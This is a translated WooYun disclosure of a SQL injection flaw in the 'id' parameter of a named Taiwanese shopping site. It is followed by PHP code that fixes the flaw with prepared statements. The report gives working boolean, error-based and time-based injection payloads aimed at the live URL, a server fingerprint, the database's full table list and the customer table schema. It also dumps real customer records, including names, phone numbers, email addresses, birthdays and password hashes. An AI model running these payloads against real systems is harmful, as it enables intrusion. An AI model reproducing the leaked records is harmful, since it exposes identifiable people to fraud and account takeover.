
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0177702

Title: SQL injection on the ONCEOK main site (large-scale leak of user information) (Taiwan region)

Affected vendor: ONCEOK

Author: 路人甲

Submitted: 2016-02-22 16:34

Fix time: 2016-02-27 16:40

Disclosed: 2016-02-27 16:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor has been notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2016-02-22: Details sent to the vendor, awaiting the vendor's handling
2016-02-27: Vendor proactively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

http://www.onceok.com.tw/scenic.php?id=1

Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7688=7688 AND 'yyIF'='yyIF
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 9007 FROM(SELECT COUNT(*),CONCAT(0x3a736f713a,(SELECT (CASE WHEN (9007=9007) THEN 1 ELSE 0 END)),0x3a72666e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BOaF'='BOaF
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: id=-2910' OR 4578=SLEEP(5) AND 'TbOI'='TbOI
---
web server operating system: Linux CentOS 4.9
web application technology: Apache 2.0.52, PHP 5.1.6
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] onceok

Proof of vulnerability:

Database: onceok
[148 tables]
+----------------------------------------+
| blog_type |
| check_log |
| city |
| company_contacts |
| config |
| customer_address |
| customer_facebook |
| customer_friends |
| customer_outsource |
| customer_wishlist |
| customers |
| customers_epaper |
| customers_fix |
| depts_info |
| email_content |
| epaper |
| footprints |
| forums_detail |
| forums_info |
| forums_topic |
| forums_topic_reply |
| forums_topic_status |
| forums_topic_type |
| forums_user |
| goods_detail |
| goods_group |
| goods_group_accumulate |
| goods_group_accumulate_log |
| goods_info |
| goods_inventory |
| goods_inventory_log |
| goods_limited |
| goods_limited_accumulate |
| goods_limited_accumulate_log |
| goods_special |
| goods_subtype |
| goods_type |
| hot_news |
| idx_ad |
| idx_choice |
| idx_pic_config |
| idx_search |
| idx_special |
| idx_store |
| inquiry_info |
| inquiry_items |
| invo_lotto |
| invo_prt |
| invo_range |
| invo_reprt |
| ip_view_pool |
| onceok_blog |
| orders_full_amount |
| orders_info |
| orders_infobak |
| orders_items |
| orders_status |
| page_content |
| page_template |
| pagetrack |
| pagetrack_transation |
| sendmail_h |
| sendmail_m |
| shopping_cart |
| stores_area |
| stores_detail |
| stores_info |
| stores_special |
| tb_ok_also_purchased_match |
| tb_ok_also_purchased_order |
| tb_ok_also_purchased_temp_items |
| tb_ok_also_purchased_temp_match |
| tb_ok_ap |
| tb_ok_atm_file |
| tb_ok_atm_file_contain |
| tb_ok_banner |
| tb_ok_cat_temp |
| tb_ok_credit_debug_log |
| tb_ok_customer_login_log |
| tb_ok_customer_order |
| tb_ok_debug_logs |
| tb_ok_freight |
| tb_ok_goods_log |
| tb_ok_goods_monthly_sales_list |
| tb_ok_goods_qa |
| tb_ok_goods_sales_all |
| tb_ok_goods_sales_day |
| tb_ok_goods_sales_month |
| tb_ok_goods_sales_status |
| tb_ok_goods_sales_week |
| tb_ok_goods_sales_year |
| tb_ok_goods_weekly_sales_list |
| tb_ok_http_referer |
| tb_ok_http_referer_order |
| tb_ok_http_referer_setup |
| tb_ok_idx_temp |
| tb_ok_keyword |
| tb_ok_money_log |
| tb_ok_money_type |
| tb_ok_order_qa |
| tb_ok_order_rec |
| tb_ok_order_status_log |
| tb_ok_return_d |
| tb_ok_return_m |
| tb_ok_return_status |
| tb_ok_role |
| tb_ok_role_ap |
| tb_ok_scenic |
| tb_ok_scenic_content |
| tb_ok_search |
| tb_ok_serial |
| tb_ok_serial_test |
| tb_ok_ship_seq |
| tb_ok_shipment_d |
| tb_ok_shipment_m |
| tb_ok_shipment_status |
| tb_ok_stock |
| tb_ok_store_log |
| tb_ok_stores_sales_month |
| tb_ok_survey |
| tb_ok_survey_item |
| tb_ok_user_role |
| tb_ok_users |
| tb_ok_users_log |
| view_ok_also_purchased_order_yday |
| view_ok_also_purchased_temp_items_yday |
| view_ok_also_purchased_temp_match_yday |
| view_ok_customer_order |
| view_ok_goods_full_amount |
| view_ok_goods_monthly_sales_list |
| view_ok_goods_sales_all |
| view_ok_goods_sales_all_info |
| view_ok_goods_sales_day |
| view_ok_goods_sales_month |
| view_ok_goods_sales_status |
| view_ok_goods_sales_week |
| view_ok_goods_sales_year |
| view_ok_goods_store_info |
| view_ok_goods_type |
| view_ok_goods_weekly_sales_list |
| view_ok_http_referer_order |
| view_ok_money |
| view_ok_order_item_check |
| view_ok_ship_item_check |
| view_ok_ship_return |
| view_ok_store_sales_info |
| view_ok_stores_type |
| view_search_keywords_yahoo |
+----------------------------------------+
Database: onceok
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| customers | 41591 |
Table: customers
[46 columns]
+----------------+---------------------+
| Column | Type |
+----------------+---------------------+
| position | varchar(10) |
| address | varchar(150) |
| auth | varchar(32) |
| bday | tinyint(3) unsigned |
| birthday | varchar(10) |
| blog | varchar(200) |
| bmonth | tinyint(3) unsigned |
| byear | int(10) unsigned |
| career | varchar(5) |
| cdate | datetime |
| city | varchar(10) |
| CREATE_DATE | datetime |
| CREATE_USER | varchar(100) |
| credit_card | varchar(1) |
| DATESTAMP | datetime |
| description | varchar(100) |
| district | varchar(10) |
| education | varchar(1) |
| email | varchar(100) |
| email_epaper | varchar(1) |
| email_premium | varchar(1) |
| facebook | varchar(50) |
| fax_01 | varchar(16) |
| fax_02 | varchar(16) |
| fburl | varchar(200) |
| free_sepecial | tinyint(4) |
| gender | varchar(1) |
| google | varchar(100) |
| id | varchar(100) |
| identification | varchar(10) |
| income | varchar(10) |
| info | varchar(50) |
| ldate | datetime |
| mobile | varchar(10) |
| name | varchar(20) |
| ok_money_total | int(11) |
| ok_ranking | int(11) |
| password | varchar(60) |
| status | varchar(1) |
| tel_day | varchar(30) |
| tel_night | varchar(16) |
| uid | int(11) unsigned |
| user_id | varchar(100) |
| USERSTAMP | varchar(100) |
| yahoo | varchar(100) |
| zip | varchar(5) |
+----------------+---------------------+
Selected columns as proof:
Table: customers
[10 entries]
+------+------------------+-------+-------------------------+--------+------------+-------------+------------+----------+-------------------------------------+
| city | name | yahoo | email | google | mobile | address | birthday | facebook | password |
+------+------------------+-------+-------------------------+--------+------------+-------------+------------+----------+-------------------------------------+
| ??? | chuang, hung pin | NULL | <blank> | NULL | 0935223535 | ???36? | 1970-12-28 | NULL | d9618da8da4fb1d80daf02797b4d4340:c4 |
| ??? | ??? | NULL | joanna1501@yahoo.com.tw | NULL | 0972276630 | ????26? | 1974-12-12 | NULL | 6409432bdc4af080ed845b93fca62617:c3 |
| ??? | ??? | NULL | dw6015@yahoo.com.hk | NULL | 0912539196 | ????3?766? | 1975-12-19 | NULL | c2a8a393bb8941f8b4463f30646c891f:64 |
| ??? | ??? | NULL | yentinglee@hotmail.com | NULL | 0928979708 | ????27?103? | 1976-12-19 | NULL | f670d02dd1aee9059d84800f545a4cea:5c |
| ??? | ??? | NULL | huchuway@yahoo.com.tw | NULL | 0918166698 | ????77?7??3 | 1982-12-19 | NULL | 66136131b80e871fe8e5617158e8a4c9:d5 |
+------+------------------+-------+-------------------------+--------+------------+-------------+------------+----------+-------------------------------------+

Remediation:

Parameterized SQL and prepared statements
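The remediation above in concrete form. This is an added example written for this page, not the ONCEOK site's own code: it shows the kind of lookup behind scenic.php?id= written first in the injectable string-concatenation style and then with a PDO prepared statement. The DSN, credentials, the `title` column and the exact query shape are assumptions; the table name tb_ok_scenic is taken from the table list above.

```php
<?php
// Added example (not the site's code). Two versions of the scenic lookup.

// 1) Injectable pattern: the request value is spliced into the SQL text, so a
//    value such as  1' AND 7688=7688 AND 'yyIF'='yyIF  becomes part of the
//    statement and the DBMS evaluates the attacker's expression (the
//    boolean-, error- and time-based probes above all rely on this).
function scenic_query_vulnerable(PDO $db, $id) {
    $sql = "SELECT id, title FROM tb_ok_scenic WHERE id = '" . $id . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// 2) Hardened pattern: the SQL text is prepared with a placeholder and the
//    value is bound separately, so it can never alter the statement's
//    structure regardless of the quotes or keywords it contains.
function scenic_query_prepared(PDO $db, $id) {
    // Type check first: scenic ids are integers, so anything that is not a
    // plain unsigned integer is rejected before it reaches the database.
    if (!ctype_digit((string) $id)) {
        return array();
    }
    $stmt = $db->prepare('SELECT id, title FROM tb_ok_scenic WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage with hypothetical connection details.
$db = new PDO(
    'mysql:host=localhost;dbname=onceok',   // assumed DSN
    'app_user',                             // assumed credentials
    'app_password',
    array(
        // Throw on errors instead of returning false; combine with
        // display_errors=Off in production so error text never reaches the
        // browser (error-based injection depends on seeing it).
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        // Use real server-side prepares rather than client-side emulation.
        PDO::ATTR_EMULATE_PREPARES => false,
    )
);

$id   = isset($_GET['id']) ? $_GET['id'] : '';
$rows = scenic_query_prepared($db, $id);
foreach ($rows as $row) {
    echo htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8'), "\n";
}
```

The integer check is a belt-and-braces addition: the bound parameter alone already prevents injection, but rejecting non-numeric ids keeps malformed requests out of the database and out of the error log entirely. The same pattern applies to every other parameter the site reads into a query, not only `id`.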

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2016-02-27 16:40

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet


Comments on the vulnerability:

Comments

  1. 2016-02-29 09:06 | 暴走 ( Regular white hat | Rank: 518, vulnerabilities: 95 | Earning Rank on WooYun is like climbing the Dota ladder, only worse... )

    OP, this is probably a duplicate of WooYun: 萬事OK online store SQL injection, isn't it?